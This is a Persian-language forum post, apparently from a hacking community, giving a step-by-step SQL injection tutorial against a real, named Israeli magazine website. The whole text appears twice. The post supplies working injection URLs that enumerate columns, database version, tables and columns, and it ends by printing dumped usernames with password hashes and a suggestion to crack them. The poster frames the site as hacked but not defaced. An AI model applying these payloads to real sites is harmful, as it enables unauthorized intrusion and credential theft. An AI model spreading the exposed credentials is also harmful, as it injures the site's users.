با سلام یک سایت اسرائیلی زدم اما دیفیس نکردم تا آموزش مرحله به مرحله رو داخل فروم بزارم ....
خوب تارگت : http://www.connectionsmag.co.il/articlenav.php?id=1163
مرحله اول : تست نفوذ پذیری با استفاده از ------> "<-------
http://www.connectionsmag.co.il/articlenav.php?id=1163%27
مرحله دوم : استفاده از دستور
+order+by+1
بزای به دست آوردن تعداد کولومن ها این کارو تا جایی ادامه میدیم که به ارور اس کیو ال برسیم ...
http://www.connectionsmag.co.il/articlenav.php?id=-99+order+by+8
خوب در عدد 8 ما ارور رو پیدا کردیم پس یعنی 7 تا کولومن موجوده . . .
مرحله سوم : استفاده از دستور
+Union+select+1,2,3,4,5,6,7
www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,5,6,7
برای پیدا کردن کولومن آسیب پذیر که به ما اجازه تزریق کد های اس کیو ال رو میده ....
مرحله چهارم : استفاده از دستور
@@version
http://www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,@@version,6,7
که جایگزین کولومن آسیب پذیز میشود برای به دست آوردن ورژن دیتا بیس ...
مرحله پنجم : استفاده از دستور
+group_concat(table_name)+.........+from+informati on_schema.tables--
www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,group_concat(table_name),6 ,7+from+information_schema.tables--
که برای به دست آوردن نام تیبل های موجود در دیتابیس است . . .
مرحله ششم : پیدا کردن تیبل مشکوک که حاوی اطلاعات مربوط به لوگین میباشد که اکثر وقت ها (user - Users - Admin - administrator - ..... ( میباشد
که در این تارگت Passwords تیبل حاوی اطلاعات لوگین میباشد . . .
مرحله هفتم : دیکود کردن تیبل مورد نظر با استفاده از افزونه Hack bar Firefox به Char() برای جایگزینی در کد اس کیو ال و دور زدن ( بایپس ) ارور های احتمالی . . .
passwords=CHAR(112, 97, 115, 115, 119, 111, 114, 100, 115)
مرحله هشتم : استفاده از دستور
+groupe_concat(Column_name)+........+from+informat ion_Schema.Columns+where+table_name=
http://www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,group_concat%28column_name %29,6,7+from+information_schema.columns+where+tabl e_name=CHAR%28112,%2097,%20115,%20115,%20119,%2011 1,%20114,%20100,%20115%29
برای دیدن اطلاعات حاوی در تیبل مورد نظر ....
مرحله نهم : استفاده از دستور
+group_concat(....,0x3a,.....)+....+from+......
http://www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,group_concat%28username,0x 3a,upassword%29,6,7+from+passwords--
برای فراخوانی یوزرنیم و پسورد و یا اطلاعات مربوط به کولومن مورد نظر . . .
dstern:215473c75f51967a,Rebecca:3226c364425580e1,y clark:5668a61a05d9c04b,alevitas:221f244861e476d0
پسورد ها هش شدن باید کرک کنید با استفاده از متود های کرکینگ و یا سایت های آنلاین . . .
امیدوارم این پست برای دوستان مفید باشه ، یا حق
خوب تارگت : http://www.connectionsmag.co.il/articlenav.php?id=1163
مرحله اول : تست نفوذ پذیری با استفاده از ------> "<-------
http://www.connectionsmag.co.il/articlenav.php?id=1163%27
مرحله دوم : استفاده از دستور
+order+by+1
بزای به دست آوردن تعداد کولومن ها این کارو تا جایی ادامه میدیم که به ارور اس کیو ال برسیم ...
http://www.connectionsmag.co.il/articlenav.php?id=-99+order+by+8
خوب در عدد 8 ما ارور رو پیدا کردیم پس یعنی 7 تا کولومن موجوده . . .
مرحله سوم : استفاده از دستور
+Union+select+1,2,3,4,5,6,7
www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,5,6,7
برای پیدا کردن کولومن آسیب پذیر که به ما اجازه تزریق کد های اس کیو ال رو میده ....
مرحله چهارم : استفاده از دستور
@@version
http://www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,@@version,6,7
که جایگزین کولومن آسیب پذیز میشود برای به دست آوردن ورژن دیتا بیس ...
مرحله پنجم : استفاده از دستور
+group_concat(table_name)+.........+from+informati on_schema.tables--
www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,group_concat(table_name),6 ,7+from+information_schema.tables--
که برای به دست آوردن نام تیبل های موجود در دیتابیس است . . .
مرحله ششم : پیدا کردن تیبل مشکوک که حاوی اطلاعات مربوط به لوگین میباشد که اکثر وقت ها (user - Users - Admin - administrator - ..... ( میباشد
که در این تارگت Passwords تیبل حاوی اطلاعات لوگین میباشد . . .
مرحله هفتم : دیکود کردن تیبل مورد نظر با استفاده از افزونه Hack bar Firefox به Char() برای جایگزینی در کد اس کیو ال و دور زدن ( بایپس ) ارور های احتمالی . . .
passwords=CHAR(112, 97, 115, 115, 119, 111, 114, 100, 115)
مرحله هشتم : استفاده از دستور
+groupe_concat(Column_name)+........+from+informat ion_Schema.Columns+where+table_name=
http://www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,group_concat%28column_name %29,6,7+from+information_schema.columns+where+tabl e_name=CHAR%28112,%2097,%20115,%20115,%20119,%2011 1,%20114,%20100,%20115%29
برای دیدن اطلاعات حاوی در تیبل مورد نظر ....
مرحله نهم : استفاده از دستور
+group_concat(....,0x3a,.....)+....+from+......
http://www.connectionsmag.co.il/articlenav.php?id=-99+union+select+1,2,3,4,group_concat%28username,0x 3a,upassword%29,6,7+from+passwords--
برای فراخوانی یوزرنیم و پسورد و یا اطلاعات مربوط به کولومن مورد نظر . . .
dstern:215473c75f51967a,Rebecca:3226c364425580e1,y clark:5668a61a05d9c04b,alevitas:221f244861e476d0
پسورد ها هش شدن باید کرک کنید با استفاده از متود های کرکینگ و یا سایت های آنلاین . . .
امیدوارم این پست برای دوستان مفید باشه ، یا حق
نظر